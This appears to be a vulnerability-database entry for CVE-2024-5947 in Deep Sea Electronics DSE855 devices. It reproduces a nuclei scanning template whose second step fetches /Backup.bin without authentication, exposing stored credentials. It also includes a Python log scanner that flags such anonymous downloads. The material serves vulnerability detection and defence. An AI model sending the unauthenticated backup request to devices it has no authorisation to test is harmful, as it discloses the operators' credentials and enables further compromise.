
Deep Sea Electronics DSE855 - Authentication Bypass

Published: 03 Jul 2026 03:01:05
Reported by: ProjectDiscovery
Type: nuclei
Source: github.com

Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Deep Sea Electronics DSE855 devices.

id: CVE-2024-5947

info:
  name: Deep Sea Electronics DSE855 - Authentication Bypass
  author: s4e-io
  severity: medium
  description: |
    Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Deep Sea Electronics DSE855 devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based UI. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-22679.
  impact: |
    Unauthenticated network-adjacent attackers can download configuration backup files containing stored credentials without authentication.
  remediation: |
    Contact Deep Sea Electronics for a firmware update that addresses the authentication bypass vulnerability in DSE855 devices.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-5947
    - https://packetstormsecurity.com/files/179342/Deep-Sea-Electronics-DSE855-Remote-Authentication-Bypass.html
    - https://www.zerodayinitiative.com/advisories/ZDI-24-671/
  classification:
    epss-score: 0.02418
    epss-percentile: 0.82141
  metadata:
    verified: "true"
    max-request: 1
    vendor: Deep Sea Electronics
    product: DSE855
    fofa-query: "Deep Sea Electronics"
  tags: packetstorm,cve,cve2024,bypass,info-leak,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"Copyright Deep Sea Electronics")'
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        GET /Backup.bin HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type,"Unknown")'
          - "status_code == 200"
        condition: and
# digest: 4a0a004730450220551b95d37caf1771491d8606301f3de48c207d098e106efb69f0c35ea0ad3c6b02210091c6a9107d6b49ca3a5aa3eeb6b4796963e3d90a9d8ccb4e9a24534778eb5143:922c64590222798bb761d5b6d8e72950
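
A defensive counterpart to the template's second request, added here as an example (it is not part of the original template or of ProjectDiscovery's code): it scans access logs for requests to `/Backup.bin` and separates backups served to anonymous clients from blocked or authenticated ones. It assumes a reverse proxy in front of the device writes Common Log Format with the authenticated user in the third field; the sample lines, `find_backup_access` and the verdict labels are constructed for illustration.

```python
import re

# Constructed sample lines in Common Log Format (documentation IPs, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [03/Jul/2026:03:01:05 +0000] "GET / HTTP/1.1" 200 5120
192.0.2.10 - - [03/Jul/2026:03:01:06 +0000] "GET /Backup.bin HTTP/1.1" 200 20480
198.51.100.7 - - [03/Jul/2026:04:10:00 +0000] "GET /Backup.bin HTTP/1.1" 401 0
203.0.113.5 - operator [03/Jul/2026:05:00:00 +0000] "GET /Backup.bin HTTP/1.1" 200 20480
203.0.113.9 - - [03/Jul/2026:06:00:00 +0000] "GET /index.html HTTP/1.1" 200 900
"""

CLF = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)
BACKUP_PATH = "/Backup.bin"  # path requested by the template's second step


def find_backup_access(log_text):
    """Return one finding per request to the backup path, classified by outcome."""
    findings = []
    for line in log_text.splitlines():
        m = CLF.match(line.strip())
        if not m:
            continue  # not a CLF line
        path = m["path"].split("?", 1)[0]
        # Assumption: compare case-insensitively so case variants are not missed.
        if path.lower() != BACKUP_PATH.lower():
            continue
        served = m["status"] == "200"
        anonymous = m["user"] == "-"
        if served and anonymous:
            verdict = "exposed"        # backup returned with no authenticated user
        elif served:
            verdict = "authenticated"  # served, but the proxy recorded a user
        else:
            verdict = "blocked"        # request was refused
        findings.append({"ip": m["ip"], "ts": m["ts"],
                         "status": int(m["status"]), "verdict": verdict})
    return findings


if __name__ == "__main__":
    for f in find_backup_access(SAMPLE_LOG):
        print(f"{f['verdict']:>13}  {f['ip']:<15} {f['status']}  {f['ts']}")
```

Any `exposed` finding means a configuration backup, and the credentials stored in it, left the device without authentication, so those credentials should be treated as disclosed.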


04 Feb 2026 07:00 (current)
Risk: 6.5 (Medium)
Vulners AI Score: 6.5
CVSS 3.1: 6.5
CVSS 3: 6.5
EPSS: 0.02418